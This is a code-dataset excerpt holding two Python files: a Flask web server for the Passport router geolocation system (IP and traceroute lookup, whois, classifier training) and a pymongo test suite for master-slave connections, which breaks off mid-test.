source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
passport.py
|
# -*- coding: utf-8 -*-
"""
passport.py
~~~~~~~~~~~
Passport: A country-lvel router geolocation system
This module implements the execution of main geolcation system (with website) of the Passport System.
:author: Muzammil Abdul Rehman
:credits: [Muzammil Abdul Rehman, Dave Choffnes, Sharon Goldberg]
:copyright: Northeastern University © 2018.
:license: Custom BSD, see LICENSE for more details.
:email: passport@ccs.neu.edu
"""
__author__ = "Muzammil Abdul Rehman"
__copyright__ = "Northeastern University © 2018"
__license__ = "Custom BSD"
__email__ = "passport@ccs.neu.edu"
import sys
import os
import signal
import configs.system
from ppstore import traindata
import ppclassifier
from ppclassifier import GeoLocClassifier
###remove-me-later-muz###from ipwhois import IPWhois
import traceback
from flask import Flask, request, jsonify
import flask
import json
###remove-me-later-muz###import trparse
from multiprocessing import Process, Manager
from threading import Thread
import time
# -*- coding: utf-8 -*-
###remove-me-later-muz###from intervaltree import Interval, IntervalTree
import ensemble.extinfluence.quadratic
import ensemble.extinfluence.randomize
import ensemble.extinfluence.proportional
import ensemble.secondaryanalysis
import ensemble.datapts
import ensemble.utils as util_ensemble_code
import geosources
import pputils
from ppmeasurements import util as util_traceroutes
###remove-me-later-muz###import netaddr as ipaddress
import ppnamespace
import geosources.geolocation
from geosources import whois
###remove-me-later-muz###import logging
import ppcore.system.online
import ppcore.system.prediction as prediction_system
import ppcore.system.utils as util_geoloc_system
import routerinfo.aliases as router_alias_package
import world.geography
import datetime
WEB_SERVER_APP = Flask(__name__.split('.')[0],
static_folder=os.path.join(configs.system.WEB_PARENT_FOLDER,
configs.system.WEB_STATIC_FOLDER),
template_folder=os.path.join(configs.system.WEB_PARENT_FOLDER,
configs.system.WEB_TEMPLATES_FOLDER))
##############################################################################
##############################################################################
# Web server - Starts
def get_whois_information(ip_address):
""" Returns the WhoIS information for a speicific IP address"""
return whois.get_whois_information(ip_address)
def run_web_server():
""" This starts a webserver that listens and responds to user requests"""
WEB_SERVER_APP.run(host=configs.system.SERVER_HOST,
port=configs.system.SERVER_PORT, threaded=True,
debug=configs.system.WEB_DEBUG_MODE)
@WEB_SERVER_APP.route('/')
def index_page():
""" The index page when the user lands on the website"""
#return flask.redirect(flask.url_for('v1_locate_ip_address_form'))
return flask.render_template('index.html')
@WEB_SERVER_APP.route('/contact')
def contact_page():
""" Return the page containing the contact infromation of the developers"""
return flask.render_template('contact.html')
@WEB_SERVER_APP.route('/about')
def about_page():
""" Return the page containing the infromation about the developers and the project"""
return flask.render_template('about.html')
@WEB_SERVER_APP.route('/interesting_cases')
def interesting_cases():
return flask.render_template('interesting_cases.html')
@WEB_SERVER_APP.route('/locate_ip_address_form')
def v1_locate_ip_address_form():
""" Returns a form to submit an IP address for geolocation """
return flask.render_template('locate_ip_address_form.html')
@WEB_SERVER_APP.route('/api/v1/locatetrace', methods=['GET'])
@WEB_SERVER_APP.route('/api/v1/locate_traceroute', methods=['GET'])
@WEB_SERVER_APP.route('/api/v1/locateip', methods=['GET'])
@WEB_SERVER_APP.route('/api/v1/locate_ip_address', methods=['GET'])
def api_access_page():
""" Return the redirection page for get requests to the API"""
return flask.render_template('api_access.html')
@WEB_SERVER_APP.route('/locate_ip_address', methods=['POST'])
def v1_locate_ip_address():
""" Returns the web page after posting a request to geolocate an IP address"""
predictions_all = []
ip_address = request.form['ip_address']
predictions_dict = v1_locateip(ip_address)
predictions_all.append(predictions_dict)
# package data in a traceroute object
predictions_dict_traceroute = {'error': predictions_dict['error'],
'error_type': predictions_dict['error_type'],
'status': predictions_dict['status'],
'completed': True,
'dest_name': '',
'dest_ip': '',
'predictions': predictions_all}
if predictions_dict_traceroute['status'] != 'finished':
predictions_dict_traceroute['completed'] = False
# get countries
country_name_dict = {}
country_name_dict = {ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND[cde]:cde
for cde in ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND}
return flask.render_template('locate_ip_address.html', traceroute_info_object=predictions_dict_traceroute,
predictions=predictions_dict_traceroute['predictions'],
status=predictions_dict_traceroute['status'],
error_type=predictions_dict_traceroute['error_type'],
error=predictions_dict_traceroute['error'], country_name_to_code=country_name_dict)
@WEB_SERVER_APP.route('/api/v1/locateip', methods=['POST'])
@WEB_SERVER_APP.route('/api/v1/locate_ip_address', methods=['POST'])
def v1_api_locate_ip_address():
""" Requests an IP geolocation (using API) if not already requested, and returns the information about that
IP address (if infromation is available)
# input: {'ip': 12.3.12.1}
# output: {"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.200.204.2",
# "hostname": "10.200.204.2", "overall": [], "combined": [], "hop": 1, "error": True, "classifier": []}
"""
data = request.data
return_data = {'error': True, 'error_type': 'Invalid Input'}
try:
data_dict = json.loads(data)
if 'ip' not in data_dict or (type(data_dict['ip']) != str and type(data_dict['ip']) != unicode):
return return_data
except:
return_data['error_type'] = 'Invalid Input: Please provide a JSON object.'
return return_data
predictions_dict = v1_locateip(data_dict['ip'])
return jsonify(predictions_dict)
def v1_locateip(ip_address):
"""
Requests the online system add an IP address to the measurement queue and return the result.
:param ip_address: a string representation of an IPv4 address
:return predictions_dict: A dictionary containing information about errors, predicted locations and status of IP.
"""
#predictions_all = []
predictions_dict = ppcore.system.online.get_predictions_ip_address(ip_address)
#predictions_all.append(predictions_dict)
#online_system.sort_on_hop_number(predictions_all)
print_data = "v1_locateip: " + str(predictions_dict)
WEB_SERVER_APP.logger.debug(print_data)
return predictions_dict
@WEB_SERVER_APP.route('/locate_traceroute_form')
def v1_locate_traceroute_form():
""" Returns the web page after posting a request to geolocate all IP addresses of a traceroute"""
return flask.render_template('locate_traceroute_form.html')
@WEB_SERVER_APP.route('/locate_traceroute', methods=['POST'])
def v1_locate_traceroute():
""" Returns the web page after posting a request to geolocate all IP addresses of a trsceroute"""
traceroute_data = request.form['traceroute_data']
predictions_dict_traceroute = v1_locatetrace(traceroute_data)
#WEB_SERVER_APP.logger.debug(globals_file.COUNTRY_ISO_CODE_DICT)
country_name_dict = {}
country_name_dict = {ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND[cde]:cde
for cde in ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND}
return flask.render_template('locate_traceroute.html',traceroute_info_object=predictions_dict_traceroute,
predictions=predictions_dict_traceroute['predictions'],
status=predictions_dict_traceroute['status'],
error_type=predictions_dict_traceroute['error_type'],
error=predictions_dict_traceroute['error'], country_name_to_code=country_name_dict)
@WEB_SERVER_APP.route('/api/v1/locatetrace', methods=['POST'])
@WEB_SERVER_APP.route('/api/v1/locate_traceroute', methods=['POST'])
def v1_api_locate_traceroute():
""" Requests IP geolocation (using API) of all IPs in traceroutes if not already requested. Also parses and
checks the validity of the traceroute.
# input: {'traceroute_data': "some string about traceroutes"}
# output:
{"status": "running", "dest_name": "10.200.204.2", "completed": False, "error_type": "", "predictions": [
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.200.204.2",
"hostname": "10.200.204.2", "overall": [], "combined": [], "hop": 1, "error": True, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "129.10.110.2", "hostname": "129.10.110.2",
"overall": [], "combined": [], "hop": 2, "error": False, "classifier": []},
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.2.29.52",
"hostname": "10.2.29.52", "overall": [], "combined": [], "hop": 3, "error": True, "classifier": []},
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.2.29.33",
"hostname": "10.2.29.33", "overall": [], "combined": [], "hop": 4, "error": True, "classifier": []},
{"status": "finished", "error_type": "private_IPv4_address", "area": [], "ip": "10.2.29.230",
"hostname": "10.2.29.230", "overall": [], "combined": [], "hop": 5, "error": True, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "207.210.142.101",
"hostname": "nox1sumgw1-neu-cps.nox.org", "overall": [], "combined": [], "hop": 6, "error": False,
"classifier": []}, {"status": "finished", "error_type": "",
"area": ["United States", "Canada", "Bermuda", "Saint Pierre and Miquelon"],
"ip": "198.71.47.61", "hostname": "et-10-0-0.122.rtr.eqch.net.internet2.ed",
"overall": ["United States"], "combined": ["United States"], "hop": 7, "error": False,
"classifier": ["United States"]},
{"status": "running", "error_type": "", "area": [], "ip": "72.14.220.117", "hostname": "72.14.220.117",
"overall": [], "combined": [], "hop": 8, "error": False, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "108.170.243.193", "hostname": "108.170.243.193",
"overall": [], "combined": [], "hop": 9, "error": False, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "216.239.42.107", "hostname": "216.239.42.107",
"overall": [], "combined": [], "hop": 10, "error": False, "classifier": []},
{"status": "running", "error_type": "", "area": [], "ip": "216.58.192.206",
"hostname": "ord30s25-in-f206.1e100.net", "overall": [], "combined": [], "hop": 11, "error": False,
"classifier": []}], "error": False, "dest_ip": "10.200.204.2"}
"""
data = request.data
return_data = {'error': True, 'error_type': 'Invalid Input.', 'status': 'failed', 'predictions': []}
try:
data_dict = json.loads(data)
if 'traceroute_data' not in data_dict or (type(data_dict['traceroute_data']) != str and type(data_dict['traceroute_data']) != unicode):
return return_data
except:
return_data['error_type'] = 'Invalid Input: Please provide a JSON object.'
return return_data
predictions_dict_traceroute = v1_locatetrace(str(data_dict['traceroute_data']))
return jsonify(predictions_dict_traceroute)
def v1_locatetrace(traceroute_data_string):
"""
Tries to parse a string and convert to machine-readable traceorute information. Then perform geolocation on
all IP addresses
:param traceroute_data_string: same data type as `func` v1_api_locate_traceroute()
:return: same data type as `func` v1_api_locate_traceroute()
"""
predictions_all = []
return_data = {'error': False,
'error_type': '',
'status': 'running',
'completed': False,
'dest_name': '',
'dest_ip': '',
'predictions': predictions_all}
# convert a stringt to a list using external libraries
success, trparse_list = util_traceroutes.traceroute_string_to_list(traceroute_data_string)
# if failed to parse the string for traceroute return
if not success:
return_data['status'] = 'failed' # finished, failed, running,
return_data['error'] = True
return_data['error_type'] = 'Invalid Traceroute: Please provide a correct traceroute.'
return return_data
# if successful
return_data['dest_name'] = trparse_list.dest_name
return_data['dest_ip'] = trparse_list.dest_ip
# for each hop request geolcation
for hop in trparse_list.hops:
# we only do one probe
hop_idx = hop.idx
for probe in hop.probes:
if probe.ip is None:
continue
hostname = probe.name
if probe.name is None:
hostname = ''
predictions_dict = ppcore.system.online.get_predictions_ip_address(probe.ip, hostname, hop_idx)
predictions_all.append(predictions_dict)
break
# sorting the results is important for website display
ppcore.system.online.sort_on_hop_number(predictions_all)
return_data['predictions'] = predictions_all
return_data['status'] = 'finished' # finished, failed, running,
return_data['completed'] = True
# check if all the IP addresses located
for pred in predictions_all:
if pred['status'] != 'finished':
return_data['status'] = 'running' # finished, failed, running,
if return_data['status'] != 'finished':
return_data['completed'] = False
return return_data
@WEB_SERVER_APP.errorhandler(404)
def page_not_found(error):
return 'This page does not exist', 404
@WEB_SERVER_APP.route('/api/v1/geosources', methods=['POST'])
def geosources():
data = request.data
data_list = json.loads(data)
return json.dumps(geosources.geolocation.get_inaccurate_locations(data_list[0]))
@WEB_SERVER_APP.route('/api/v1/whois', methods=['POST'])
def whois():
""" A function to get whois information about an ip address """
#WEB_SERVER_APP.logger.warning('A warning occurred (%d apples)', 42)
#WEB_SERVER_APP.logger.error('An error occurred')
#WEB_SERVER_APP.logger.info('Info')
data = request.data
data_list = json.loads(data)
#print data_list
return json.dumps(whois.get_whois_information(data_list[0]))
@WEB_SERVER_APP.route('/api/v1/test_classifier', methods=['POST'])
def testclassifier():
""" A function to test classifier predictions """
data = request.data
test_data = json.loads(data)
pred_results = []
for loaded_cls in ppnamespace.LOADED_CLASSIFIERS:
pred_data = loaded_cls.predict(test_data)
#print pred_data
for i in xrange(len(pred_data)):
if i % 2 == 0:
elem = loaded_cls.classifier_name + "_" + pred_data[i]
else:
elem = pred_data[i]
pred_results.append(elem)
return json.dumps(pred_results)
# Web server - Ends
##############################################################################
##############################################################################
global RUNNING_PROCESSES
RUNNING_PROCESSES = []
global RUNNING_THREADS
RUNNING_THREADS = []
global MANAGER
MANAGER = Manager()
ppnamespace.init(MANAGER)
def close_program(graceful_close):
""" Cleaning exit the system and kill all the processes """
# close the flask process.
#globals_file.SYSTEM_DICT_MAIN[configs.system.SYSTEM_PROC_RUNNING] = False
for process in RUNNING_PROCESSES:
try:
if not graceful_close:
process.terminate()
process.join()
except:
pass
sys.exit(0)
def signal_handler(signal, frame):
close_program(False)
def redo_analysis():
"""Perfoms the offlline classifier analysis, only."""
current_processes = []
# primary analysis for three types of external influences (of number of instances) on the country prediction
proc = Process(target=ensemble.extinfluence.quadratic.main)
current_processes.append(proc)
proc = Process(target=ensemble.extinfluence.randomize.main)
current_processes.append(proc)
proc = Process(target=ensemble.extinfluence.proportional.main)
current_processes.append(proc)
for proc in current_processes:
RUNNING_PROCESSES.append(proc)
proc.start()
for proc in current_processes:
proc.join()
try:
RUNNING_PROCESSES.remove(proc)
except:
pass
# secondary analysis using second deriv and max points
ensemble.secondaryanalysis.perform_secondary_analysis()
# generate a file containing the number of instances :)
ensemble.datapts.generate_data_points()
# this is the folder called 8. if you want to compare with prop then take
# number_against_countrydata.py file and rename it to generate_points_data
# and then modify it like the seconday analysis file. but till then
# use the points generated from secondary analysis file and add a simple
# 30 and 50 instance classifier as well.
def train_classifiers_after_analyis():
""" Train all the new classifiers after running an offline analysis on the ground truth."""
# get country-based training data
countries_with_count = traindata.get_all_countries()
countries_with_count.sort(key=lambda k: k['count'])
country_training_data = {}
for country in countries_with_count:
cnt_data = traindata.get_training_data_country(country)
country_training_data[country['country']] = cnt_data
# load the csv file containing the number of points for each classifier.
DATA_PTS_FILES = util_ensemble_code.get_files_relative_folder('', '.csv')
data_pts_file = DATA_PTS_FILES[configs.system.GENERATE_DATA_POINTS_FILE_PTS]
IMPORTANT_COLUMNS = [2, 3, 7, 9, 13, 14]
remove_symbols = [' ', '/', '(', ')']
# train multiple variants of each classifier
for i in range(configs.system.NUM_VARIANTS_CLS):
for col in IMPORTANT_COLUMNS:
f_name = data_pts_file[0][col]
f_name = f_name.lower()
for sym in remove_symbols:
f_name = f_name.replace(sym, "_")
f_name = f_name + "_" + str(i) + ".pkl"
num_inst = {}
for row in data_pts_file:
cnt_nme = row[0].split('.txt')[0]
try:
num_inst[cnt_nme] = int(float(row[col]))
except:
num_inst[cnt_nme] = 1
# get training data
train = util_ensemble_code.choose_train_data(country_training_data,
num_inst)
train = util_ensemble_code.add_nac(train, 50)
# train
print "Training: ", f_name
geoloc_cls = GeoLocClassifier()
geoloc_cls.train_classifier(train)
if not ppclassifier.save_classifier(geoloc_cls, f_name):
print "Failed to save:", f_name
# save the classifier
ppnamespace.LOADED_CLASSIFIERS.append(geoloc_cls)
def train_default_classifier():
""" Train a classifier using the entire training dataset """
train = traindata.get_training_data_all()
train = util_ensemble_code.add_nac(train, 50)
geoloc_cls_default = GeoLocClassifier()
geoloc_cls_default.train_classifier(train)
if not ppclassifier.save_classifier(geoloc_cls_default,
configs.system.DEFAULT_CLS_FILE):
print "Failed to save a default classifier. Will serve only from mem."
ppclassifier.delete_classifier(configs.system.DEFAULT_CLS_FILE)
ppnamespace.LOADED_CLASSIFIERS.append(geoloc_cls_default)
print "Default classifier saved."
def read_values_to_geo_sources():
pputils.read_values_to_geo_sources()
def thread_process_geolocate_ip_addresses():
""" A process that maintains a queue and schedules measurements from vantage points at regular intervals
so as to never overwhelm the remote machines (VPs)"""
while True:
#print "IPs to look up:", globals_file.QUEUE_IPS_LOOKUP.qsize()
# ip address processing thread
ip_addresses_to_proc = []
if ppnamespace.QUEUE_IPS_LOOKUP.empty():
time.sleep(configs.system.THREAD_IP_PROCESSING_WAIT)
continue
while not ppnamespace.QUEUE_IPS_LOOKUP.empty():
try:
ip_addr_proc, hostname = ppnamespace.QUEUE_IPS_LOOKUP.get(False)
suc = util_geoloc_system.in_system_predictions(ip_addr_proc)
if suc:
continue
ip_addresses_to_proc.append((ip_addr_proc, hostname))
if len(ip_addresses_to_proc) >= configs.system.MAX_IPS_PROCESSING:
break
except:
traceback.print_exc()
pass
# schedule measurements for these all.
thread_list = []
for ip_addr,hostnm in ip_addresses_to_proc:
p = Thread(target=ppcore.system.online.perform_measurement_prediction_ip_address, args=(ip_addr, hostnm,))
p.daemon = False
thread_list.append(p)
for p in thread_list:
p.start()
for p in thread_list:
p.join()
try:
del thread_list[:] #delete elements
except:
pass
def main():
"""The program to perform offline analysis (if necessary) then start background threads to setup the measurement
system as well as the website"""
# don't remove this line since strptime is not threadsafe
datetime.datetime.strptime(datetime.datetime.now().strftime('%Y%m%d%H%M%S'),'%Y%m%d%H%M%S')
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Load classifiers either from disk or create new ones
if configs.system.TRAIN_NEW_CLASSIFIERS:
# train a default classifier
train_default_classifier()
# redo analysis
redo_analysis()
# retrain new classifiers and add them
train_classifiers_after_analyis()
elif configs.system.RETRAIN_CLASSIFIERS_WITHOUT_ANALYSIS_AGAIN:
# train a default classifier
train_default_classifier()
# retrain new classifiers and add them
train_classifiers_after_analyis()
else:
classifiers_from_disk = ppclassifier.load_all_classifiers()
for cls in classifiers_from_disk:
ppnamespace.LOADED_CLASSIFIERS.append(cls)
print "Loaded Classifiers"
# Load past predictions
# globals_file.overall, globals_file.classifier, globals_file.area, globals_file.combined =
# prediction_system.load_all_prediction_systems()
prediction_system.load_all_prediction_systems_into_manager(ppnamespace.overall, ppnamespace.classifier,
ppnamespace.area, ppnamespace.combined)
print "Loaded Prediction Systems"
# Load router aliases and country maps
ppnamespace.router_aliases_dict = router_alias_package.get_router_aliases() # move to parent function
ppnamespace.country_polygon_dict = world.geography.load_country_maps() # move to parent function
print "Loaded Maps and Aliases"
# read global variable
pputils.get_country_name_iso_code_dict(ppnamespace.COUNTRY_ISO_CODE_DICT)
pputils.get_country_name_iso_code_dict(ppnamespace.COUNTRY_ISO_CODE_DICT_SECOND)
# read the global variables
pputils.read_values_to_geo_sources()
# create threads and name them
# thread-1: reads queue, processes the ip addresses as required (don't use processes)
proc = Process(target=thread_process_geolocate_ip_addresses, name=configs.system.THREAD_NAME_IP_PROCESSING)
RUNNING_PROCESSES.append(proc)
proc.start()
# thread-2: saves global structures (area, classifier, overall, combined) to disk
# start the flask server, whois, test, test ensemble in a new process
proc = Process(target=run_web_server)
RUNNING_PROCESSES.append(proc)
proc.start()
# run the algorithm every x seconds and update the database.
# close all
close_program(True)
if __name__ == "__main__":
main()
#train_default_classifier()
#train_classifiers_after_analyis()
#ensemble_code.generate_data_points.main()
"""
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
if configs.system.TRAIN_NEW_CLASSIFIERS:
# train a default classifier
train_default_classifier()
else:
classifiers_from_disk = ppclassifier.load_all_classifiers()
for cls in classifiers_from_disk:
globals_file.LOADED_CLASSIFIERS.append(cls)
#main()
p = Process(target=run_web_server)
RUNNING_PROCESSES.append(p)
p.start()
close_program(True)
"""
|
test_master_slave_connection.py
|
# Copyright 2009-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for master slave connections."""
import datetime
import os
import sys
import threading
import time
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo import ReadPreference, thread_util
from pymongo.errors import ConnectionFailure, InvalidName
from pymongo.errors import CollectionInvalid, OperationFailure
from pymongo.errors import AutoReconnect
from pymongo.database import Database
from pymongo.mongo_client import MongoClient
from pymongo.collection import Collection
from pymongo.master_slave_connection import MasterSlaveConnection
from test import host, port, host2, port2, host3, port3
from test.utils import TestRequestMixin, get_pool
class TestMasterSlaveConnection(unittest.TestCase, TestRequestMixin):
def setUp(self):
self.master = MongoClient(host, port)
self.slaves = []
try:
self.slaves.append(MongoClient(
host2, port2, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
try:
self.slaves.append(MongoClient(
host3, port3, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
if not self.slaves:
raise SkipTest("Not connected to master-slave set")
self.client = MasterSlaveConnection(self.master, self.slaves)
self.db = self.client.pymongo_test
def tearDown(self):
try:
self.db.test.drop_indexes()
except Exception:
# Tests like test_disconnect can monkey with the client in ways
# that make this fail
pass
self.master = self.slaves = self.db = self.client = None
super(TestMasterSlaveConnection, self).tearDown()
def test_types(self):
self.assertRaises(TypeError, MasterSlaveConnection, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, [1])
def test_use_greenlets(self):
self.assertFalse(self.client.use_greenlets)
if thread_util.have_gevent:
master = MongoClient(host, port, use_greenlets=True)
slaves = [
MongoClient(slave.host, slave.port, use_greenlets=True)
for slave in self.slaves]
self.assertTrue(
MasterSlaveConnection(master, slaves).use_greenlets)
def test_repr(self):
self.assertEqual(repr(self.client),
"MasterSlaveConnection(%r, %r)" %
(self.master, self.slaves))
def test_disconnect(self):
class MongoClient(object):
def __init__(self):
self._disconnects = 0
def disconnect(self):
self._disconnects += 1
self.client._MasterSlaveConnection__master = MongoClient()
self.client._MasterSlaveConnection__slaves = [MongoClient(),
MongoClient()]
self.client.disconnect()
self.assertEqual(1,
self.client._MasterSlaveConnection__master._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[0]._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[1]._disconnects)
def test_continue_until_slave_works(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return (None, 'sent')
class NotRandomList(object):
last_idx = -1
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(False), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
NotRandomList.last_idx = idx
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
response = self.client._send_message_with_response('message')
self.assertEqual((NotRandomList.last_idx, 'sent'), response)
self.assertNotEqual(-1, NotRandomList.last_idx)
self.assertEqual(3, Slave.calls)
def test_raise_autoreconnect_if_all_slaves_fail(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return 'sent'
class NotRandomList(object):
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(True), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
self.assertRaises(AutoReconnect,
self.client._send_message_with_response, 'message')
self.assertEqual(4, Slave.calls)
def test_get_db(self):
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, self.client, "")
self.assertRaises(InvalidName, make_db, self.client, "te$t")
self.assertRaises(InvalidName, make_db, self.client, "te.t")
self.assertRaises(InvalidName, make_db, self.client, "te\\t")
self.assertRaises(InvalidName, make_db, self.client, "te/t")
self.assertRaises(InvalidName, make_db, self.client, "te st")
self.assertTrue(isinstance(self.client.test, Database))
self.assertEqual(self.client.test, self.client["test"])
self.assertEqual(self.client.test, Database(self.client,
"test"))
def test_database_names(self):
self.client.pymongo_test.test.save({"dummy": u"object"})
self.client.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
self.assertRaises(TypeError, self.client.drop_database, 5)
self.assertRaises(TypeError, self.client.drop_database, None)
raise SkipTest("This test often fails due to SERVER-2329")
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database("pymongo_test")
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database(self.client.pymongo_test)
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
def test_iteration(self):
def iterate():
[a for a in self.client]
self.assertRaises(TypeError, iterate)
def test_insert_find_one_in_request(self):
count = 0
for i in range(100):
self.client.start_request()
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.client.end_request()
self.assertFalse(count)
def test_nested_request(self):
client = self.client
def assertRequest(in_request):
self.assertEqual(in_request, client.in_request())
self.assertEqual(in_request, client.master.in_request())
# MasterSlaveConnection is special, alas - it has no auto_start_request
# and it begins *not* in a request. When it's in a request, it sends
# all queries to primary.
self.assertFalse(client.in_request())
self.assertFalse(client.master.in_request())
# Start and end request
client.start_request()
assertRequest(True)
client.end_request()
assertRequest(False)
# Double-nesting
client.start_request()
client.start_request()
client.end_request()
assertRequest(True)
client.end_request()
assertRequest(False)
def test_request_threads(self):
client = self.client
# In a request, all ops go through master
pool = get_pool(client.master)
client.master.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
started_request, ended_request = threading.Event(), threading.Event()
checked_request = threading.Event()
thread_done = [False]
# Starting a request in one thread doesn't put the other thread in a
# request
def f():
self.assertNotInRequestAndDifferentSock(client, pool)
client.start_request()
self.assertInRequestAndSameSock(client, pool)
started_request.set()
checked_request.wait()
checked_request.clear()
self.assertInRequestAndSameSock(client, pool)
client.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
ended_request.set()
checked_request.wait()
thread_done[0] = True
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
started_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
ended_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
t.join()
self.assertNotInRequestAndDifferentSock(client, pool)
self.assertTrue(thread_done[0], "Thread didn't complete")
# This was failing because commands were being sent to the slaves
def test_create_collection(self):
self.client.pymongo_test.test.drop()
collection = self.db.create_collection('test')
self.assertTrue(isinstance(collection, Collection))
self.assertRaises(CollectionInvalid, self.db.create_collection, 'test')
# Believe this was failing for the same reason...
def test_unique_index(self):
self.client.pymongo_test.test.drop()
self.db.test.create_index('username', unique=True)
self.db.test.save({'username': 'mike'})
self.assertRaises(OperationFailure,
self.db.test.save, {'username': 'mike'})
# NOTE this test is non-deterministic, but I expect
# some failures unless the db is pulling instantaneously...
def test_insert_find_one_with_slaves(self):
count = 0
for i in range(100):
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertTrue(count)
# NOTE this test is non-deterministic, but hopefully we pause long enough
# for the slaves to pull...
def test_insert_find_one_with_pause(self):
count = 0
self.db.test.remove({})
self.db.test.insert({"x": 5586})
time.sleep(11)
for _ in range(10):
try:
if 5586 != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertFalse(count)
def test_kill_cursor_explicit(self):
c = self.client
c.slave_okay = True
db = c.pymongo_test
test = db.master_slave_test_kill_cursor_explicit
test.drop()
for i in range(20):
test.insert({"i": i}, w=1 + len(self.slaves))
st = time.time()
while time.time() - st < 120:
# Wait for replication -- the 'w' parameter should obviate this
# loop but it's not working reliably in Jenkins right now
if list(test.find({"i": 19})):
break
time.sleep(0.5)
else:
self.fail("Replication timeout, test coll has %s records" % (
len(list(test.find()))
))
# Partially evaluate cursor so it's left alive, then kill it
cursor = test.find().batch_size(10)
self.assertNotEqual(
cursor._Cursor__connection_id,
-1,
"Expected cursor connected to a slave, not master")
self.assertTrue(cursor.next())
self.assertNotEqual(0, cursor.cursor_id)
cursor_id = cursor.cursor_id
# Cursor dead on server - trigger a getMore on the same cursor_id and
# check that the server returns an error.
cursor2 = cursor.clone()
cursor2._Cursor__id = cursor_id
if (sys.platform.startswith('java') or
'PyPy' in sys.version):
# Explicitly kill cursor.
cursor.close()
else:
# Implicitly kill it in CPython.
del cursor
self.assertRaises(OperationFailure, lambda: list(cursor2))
def test_base_object(self):
c = self.client
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({}, db.get_lasterror_options())
coll = db.test
coll.drop()
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({}, coll.get_lasterror_options())
cursor = coll.find()
self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
w = 1 + len(self.slaves)
wtimeout=10000 # Wait 10 seconds for replication to complete
c.set_lasterror_options(w=w, wtimeout=wtimeout)
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, db.get_lasterror_options())
coll = db.test
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout},
coll.get_lasterror_options())
cursor = coll.find()
